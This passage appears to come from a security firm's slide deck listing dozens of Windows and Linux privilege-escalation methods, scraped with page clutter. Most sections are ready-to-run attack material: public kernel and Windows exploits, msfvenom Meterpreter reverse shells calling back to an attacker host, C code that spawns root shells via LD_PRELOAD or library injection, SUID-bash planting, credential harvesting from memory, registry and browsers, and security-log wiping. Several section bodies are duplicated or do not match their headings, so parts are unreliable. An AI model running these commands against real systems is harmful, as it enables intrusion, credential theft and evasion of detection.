74 METHODS FOR PRIVILEGE ESCALATION
PART 2




HADESS | SECURE AGILE DEVELOPMENT
WWW.HADESS.IO
PART 1 SUMMARY

No  Method                                             Domain  APT
1   Abusing Sudo Binaries                              No
2   Abusing Scheduled Tasks                            Y/N
3   Golden Ticket With Scheduled Tasks                 Yes
4   Abusing Interpreter Capabilities                   No
5   Abusing Binary Capabilities                        No
6   Abusing ActiveSessions Capabilities                No
7   Escalate with TRUSTWORTHY in SQL Server            Y/N
8   Abusing Mysql run as root                          Y/N
9   Abusing journalctl                                 No
10  Abusing VDS                                        No
11  Abusing Browser                                    No
12  Abusing LDAP                                       Yes
13  LLMNR Poisoning                                    Yes
14  Abusing Certificate Services                       Yes
15  MySQL UDF Code Injection                           Y/N
16  Impersonation Token with ImpersonateLoggedOnUser   Yes
17  Impersonation Token with SeImpersonatePrivilege    Yes
18  Impersonation Token with SeLoadDriverPrivilege     Yes
19  OpenVPN Credentials                                No
20  Bash History                                       No
21  Packet Capture                                     Y/N
22  NFS Root Squashing                                 No
23  Abusing Access Control List                        Y/N
24  Escalate With SeBackupPrivilege                    Yes
25  Escalate With SeImpersonatePrivilege               Yes
26  Escalate With SeLoadDriverPrivilege                Yes
27  Escalate With ForceChangePassword                  Yes
28  Escalate With GenericWrite                         Yes
29  Abusing GPO                                        Yes
30  Pass-the-Ticket                                    Yes
31  Golden Ticket                                      Yes
32  Abusing Splunk Universal Forwarder                 No
33  Abusing Gdbus                                      Y/N
34  Abusing Trusted DC                                 Yes
35  NTLM Relay                                         Yes
36  Exchange Relay                                     Yes
37  Dumping with diskshadow                            Yes
38  Dumping with vssadmin                              Yes
39  Password Spraying                                  Y/N
40  AS-REP Roasting                                    Yes

PART 2

DIRTYC0W
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
gcc -pthread c0w.c -o c0w; ./c0w; passwd; id

CVE-2016-1531
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
CVE-2016-1531.sh; id

POLKIT
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
poc.sh

DIRTYPIPE
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
./traitor-amd64 --exploit kernel:CVE-2022-0847
whoami; id

PWNKIT
Domain: No | Local Admin: Yes | OS: Linux | Type: 0/1 Exploit
./cve-2021-4034
whoami; id

MS14_058
Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set TARGET <target-id>
msf exploit(ms14_058_track_popup_menu) > exploit

HOT POTATO
Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
1. In a command prompt type: powershell.exe -nop -ep bypass
2. In the PowerShell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In the PowerShell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in the PowerShell prompt type: net localgroup administrators

INTEL SYSRET
Domain: No | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
execute -H -f sysret.exe -a "-pid [pid]"

PRINTNIGHTMARE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
https://github.com/outflanknl/PrintNightmare
PrintNightmare 10.10.10.10 exp.dll

FOLLINA
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
https://github.com/JohnHammond/msdt-follina
python3 follina.py -c "notepad"

ALPC
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
https://github.com/riparino/Task_Scheduler_ALPC

REMOTEPOTATO0
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

CVE-2022-26923
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show

MS14-068
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: 0/1 Exploit
python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

PASSWORD MINING IN MEMORY (LINUX)
Domain: No | Local Admin: Yes | OS: Linux | Type: Enumeration & Hunt
ps -ef | grep ftp;
gdb -p ftp_id
info proc mappings
q
dump memory /tmp/mem [start] [end]
q
strings /tmp/mem | grep passw

PASSWORD MINING IN MEMORY (WINDOWS)
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
1. In Metasploit (msf > prompt) type:
   use auxiliary/server/capture/http_basic
   set uripath x
   run
2. In taskmgr, right-click "iexplore.exe" in the "Image Name" column and select "Create Dump File" from the popup menu.
3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
   Copy the Base64-encoded string, then in a command prompt type: echo -ne [Base64 String] | base64 -d

PASSWORD MINING IN REGISTRY
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
1. Open a command prompt and type: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername
2. In the command prompt type: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
3. Note the credentials in the output.
4. In the command prompt type: reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 /v ProxyUsername
5. In the command prompt type: reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 /v ProxyPassword
6. Note the credentials in the output.
7. In the command prompt type: reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
8. In the command prompt type: reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
9. Make note of the encrypted passwords and type: C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]
10. From the output, make note of the credentials.

PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
invoke-module LogCleaner.ps1

PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
flog -s 10s -n 200
Or
wevtutil cl Security

STARTUP APPLICATIONS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
1. In Metasploit (msf > prompt) type:
   use multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost [Kali VM IP Address]
   run
   Open another command prompt and type:
   msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
2. Place x.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".

PASSWORD MINING IN MCAFEESITELISTFILES
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpUp.exe McAfeeSitelistFiles

PASSWORD MINING IN CACHEDGPPPASSWORD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpUp.exe CachedGPPPassword

PASSWORD MINING IN DOMAINGPPPASSWORD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpUp.exe DomainGPPPassword

PASSWORD MINING IN KEEPASS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe keepass
Or
KeeTheft.exe

PASSWORD MINING IN WINDOWSVAULT
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe WindowsVault

PASSWORD MINING IN SECPACKAGECREDS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe SecPackageCreds

PASSWORD MINING IN PUTTYHOSTKEYS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe PuttyHostKeys

PASSWORD MINING IN RDCMANFILES
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe RDCManFiles

PASSWORD MINING IN RDPSAVEDCONNECTIONS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
Seatbelt.exe RDPSavedConnections

PASSWORD MINING IN MASTERKEYS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpDPAPI masterkeys

PASSWORD MINING IN BROWSERS
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpWeb.exe all

PASSWORD MINING IN FILES
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SauronEye.exe -d C:\Users\vincent\Desktop --filetypes .txt .doc .docx .xls --contents --keywords password pass* -v

PASSWORD MINING IN LDAP
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))" "samaccountname"
Or
Import-Module .\PowerView.ps1
Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime

PASSWORD MINING IN CLIPBOARD
Domain: No | Local Admin: Yes | OS: Windows | Type: Enumeration & Hunt
execute-assembly /root/SharpClipHistory.exe

PASSWORD MINING IN GMSA PASSWORD
Domain: No | Local Admin: Yes | OS: Windows | Type: Delegate tokens
GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT

DELEGATE TOKENS VIA RDP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Delegate tokens
./fake_rdp.py
Or
pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem

DELEGATE TOKENS VIA FTP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Delegate tokens
// MockFtpServer classes used by the snippet
import org.mockftpserver.fake.FakeFtpServer;
import org.mockftpserver.fake.UserAccount;
import org.mockftpserver.fake.filesystem.DirectoryEntry;
import org.mockftpserver.fake.filesystem.FileEntry;
import org.mockftpserver.fake.filesystem.FileSystem;
import org.mockftpserver.fake.filesystem.WindowsFakeFileSystem;

FakeFtpServer fakeFtpServer = new FakeFtpServer();
fakeFtpServer.addUserAccount(new UserAccount("user", "password", "c:\\data"));
FileSystem fileSystem = new WindowsFakeFileSystem();
fileSystem.add(new DirectoryEntry("c:\\data"));
fileSystem.add(new FileEntry("c:\\data\\file1.txt", "abcdef 1234567890"));
fileSystem.add(new FileEntry("c:\\data\\run.exe"));
fakeFtpServer.setFileSystem(fileSystem);
fakeFtpServer.start();

FAKE LOGON SCREEN
Domain: No | Local Admin: Yes | OS: Windows | Type: Phish
execute-assembly fakelogonscreen.exe

ABUSING WINRM SERVICES
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Service
RogueWinRM.exe -p C:\windows\system32\cmd.exe

CERTIFICATE ABUSE
Domain: Yes | Local Admin: Yes | OS: Windows | Type: Abuse Certificate
Certify.exe request /ca:dc.domain.local\DC-CA /template:User…
Rubeus.exe asktgt /user:CORP\itadmin /certificate:C:\cert.pfx /password:password

SUDO LD_PRELOAD
Domain: No | Local Admin: Yes | OS: Linux | Type: Injection
1. ldreload.c:
   #include <stdio.h>
   #include <sys/types.h>
   #include <stdlib.h>
   #include <unistd.h>   /* setgid/setuid */
   void _init() {
       unsetenv("LD_PRELOAD");
       setgid(0);
       setuid(0);
       system("/bin/bash");
   }
2. gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
3. sudo LD_PRELOAD=/tmp/ldreload.so apache2
4. id

ABUSING FILE PERMISSION VIA SUID BINARIES - (.SO INJECTION)
Domain: No | Local Admin: Yes | OS: Linux | Type: Injection
1. mkdir /home/user/.config
2. /home/user/.config/libcalc.c:
   #include <stdio.h>
   #include <stdlib.h>
   static void inject() __attribute__((constructor));
   void inject() {
       system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
   }
3. gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
4. /usr/local/bin/suid-so
5. id

DLL INJECTION
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Injection
1. RemoteDLLInjector64
   Or
   MemJect
   Or
   https://github.com/tomcarver16/BOF-DLL-Inject
2. #define PROCESS_NAME "csgo.exe"
   Or
   RemoteDLLInjector64.exe pid C:\runforpriv.dll
   Or
   mandllinjection ./runforpriv.dll pid

EARLY BIRD INJECTION
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection
hollow svchost.exe pop.bin

PROCESS INJECTION THROUGH MEMORY SECTION
Domain: No | Local Admin: Yes | OS: Windows | Type: Injection
sec-shinject PID /path/to/bin

ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Scheduled Tasks
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh;
chmod +x systemupdate.sh
Wait a while
/tmp/bash -p
id && whoami

ABUSING SCHEDULED TASKS VIA CRON WILDCARDS
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing Scheduled Tasks
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh;
touch /home/user/--checkpoint=1;
touch /home/user/--checkpoint-action=exec=sh\ systemupdate.sh
Wait a while
/tmp/bash -p
id && whoami

ABUSING FILE PERMISSION VIA SUID BINARIES - (SYMLINK)
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing File Permission
1. su - www-data;
2. nginxed-root.sh /var/log/nginx/error.log;
3. As the root user: invoke-rc.d nginx rotate >/dev/null 2>&1

ABUSING FILE PERMISSION VIA SUID BINARIES - (ENVIRONMENT VARIABLES #1)
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing File Permission
1. echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c;
2. gcc /tmp/service.c -o /tmp/service;
3. export PATH=/tmp:$PATH;
4. /usr/local/bin/suid-env; id

ABUSING FILE PERMISSION VIA SUID BINARIES - (ENVIRONMENT VARIABLES #2)
Domain: No | Local Admin: Yes | OS: Linux | Type: Abusing File Permission
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

DLL HIJACKING
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. windows_dll.c (command executed by the DLL): cmd.exe /k net localgroup administrators user /add
2. x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
3. sc stop dllsvc & sc start dllsvc

ABUSING SERVICES VIA BINPATH
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. sc config daclsvc binpath= "net localgroup administrators user /add"
2. sc start daclsvc

ABUSING SERVICES VIA UNQUOTED PATH
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Place common.exe in "C:\Program Files\Unquoted Path Service\".
3. sc start unquotedsvc

ABUSING SERVICES VIA REGISTRY
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
2. sc start regsvc

ABUSING SERVICES VIA EXECUTABLE FILE
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. sc start filepermsvc

ABUSING SERVICES VIA AUTORUN
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. In Metasploit (msf > prompt) type:
   use multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost [Kali VM IP Address]
   run
   Open an additional command prompt and type:
   msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
2. Place program.exe in "C:\Program Files\Autorun Program".

ABUSING SERVICES VIA ALWAYSINSTALLELEVATED
Domain: No | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
2. msiexec /quiet /qn /i C:\Temp\setup.msi
Or
SharpUp.exe AlwaysInstallElevated

ABUSING SERVICES VIA SECREATETOKEN
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
2. !rmpriv

ABUSING SERVICES VIA SEDEBUG
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. Conjure-LSASS
   Or
   syscall_enable_priv 20

REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE)
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
injectEtwBypass pid

ESCALATE WITH DUPLICATETOKENEX
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
PrimaryTokenTheft.exe pid
Or
TokenPlayer.exe --impersonate --pid pid

ABUSING SERVICES VIA SEINCREASEBASEPRIORITY
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
start /realtime SomeCpuIntensiveApp.exe

ABUSING SERVICES VIA SEMANAGEVOLUME
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
Compile and run SeManageVolumeAbuse.

ABUSING SERVICES VIA SERELABEL
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. WRITE_OWNER access to a resource, including files and folders.
2. Run for privilege escalation.

ABUSING SERVICES VIA SERESTORE
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with Enable-SeRestorePrivilege.
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U

ABUSE VIA SEBACKUP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. In Metasploit (msf > prompt) type:
   use auxiliary/server/capture/http_basic
   set uripath x
   run
2. In taskmgr, right-click "iexplore.exe" in the "Image Name" column and select "Create Dump File" from the popup menu.
3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
   Copy the Base64-encoded string, then in a command prompt type: echo -ne [Base64 String] | base64 -d

ABUSING VIA SECREATEPAGEFILE
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin

ABUSING VIA SESYSTEMENVIRONMENT
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
2. TrustExec.exe -m exec -c "whoami /priv" -f

ABUSING VIA SETAKEOWNERSHIP
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. takeown.exe /f "%windir%\system32"
2. icacls.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U

ABUSING VIA SETCB
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. PSBits
   Or
   PrivFu
2. psexec.exe -i -s -d cmd.exe

ABUSING VIA SETRUSTEDCREDMANACCESS
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
   Or
   CredManBOF
2. TrustExec.exe -m exec -c "whoami /priv" -f

ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
JuicyPotato.exe
Or
https://github.com/decoder-it/juicy_2
https://github.com/antonioCoco/RoguePotato

ABUSING VIA SECREATEPAGEFILE
Domain: Y/N | Local Admin: Yes | OS: Windows | Type: Abuse Privilege
1. ./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
2. flog -s 10s -n 200
Or
invoke-module LogCleaner.ps1

About Hadess
Savior of your Business to combat cyber threats
Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.

Contact Us
To request additional information about Hadess's services, please fill out the form below. A Hadess representative will contact you shortly.
Email: Marketing@hadess.io
Phone No.: +989362181112
Company No.: +982128427515, +982177873383
Website: www.hadess.io
hadess_security

Hadess Products and Services
Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.
Penetration Testing | PROTECTION PRO
Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.
Red Teaming Operation | PROTECTION PRO
Identifying and helping to address hidden weaknesses in your organization's security.
RASP | Protect Applications and APIs Anywhere
Identifying and helping to address hidden weaknesses in your Applications.
SAST | Audit Your Products
Identifying and helping to address hidden weaknesses in your organization's security.
PWN Z1 | Audit Your PPP

Metasploit for Penetration Testing: Beginner Class
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Linux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium SandboxLinux Security APIs and the Chromium Sandbox
Linux Security APIs and the Chromium Sandbox
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalation
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Lifnaaaaaa e
Lifnaaaaaa eLifnaaaaaa e
Lifnaaaaaa e
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 

Recently uploaded

dbms calicut university B. sc Cs 4th sem.pdf
dbms  calicut university B. sc Cs 4th sem.pdfdbms  calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
Shinana2
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Trusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process MiningTrusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process Mining
LucaBarbaro3
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
Hiroshi SHIBATA
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
fredae14
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
Wouter Lemaire
 
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
Hiike
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdfNunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
flufftailshop
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
alexjohnson7307
 
Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!
GDSC PJATK
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024A Comprehensive Guide to DeFi Development Services in 2024
A Comprehensive Guide to DeFi Development Services in 2024
Intelisync
 
Azure API Management to expose backend services securely
Azure API Management to expose backend services securelyAzure API Management to expose backend services securely
Azure API Management to expose backend services securely
Dinusha Kumarasiri
 

Recently uploaded (20)

dbms calicut university B. sc Cs 4th sem.pdf
dbms  calicut university B. sc Cs 4th sem.pdfdbms  calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Trusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process MiningTrusted Execution Environment for Decentralized Process Mining
Trusted Execution Environment for Decentralized Process Mining
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
 
System Design Case Study: Building a Scalable E-Commerce Platform - Hiike
System Design Case Study: Building a Scalable E-Commerce Platform - HiikeSystem Design Case Study: Building a Scalable E-Commerce Platform - Hiike
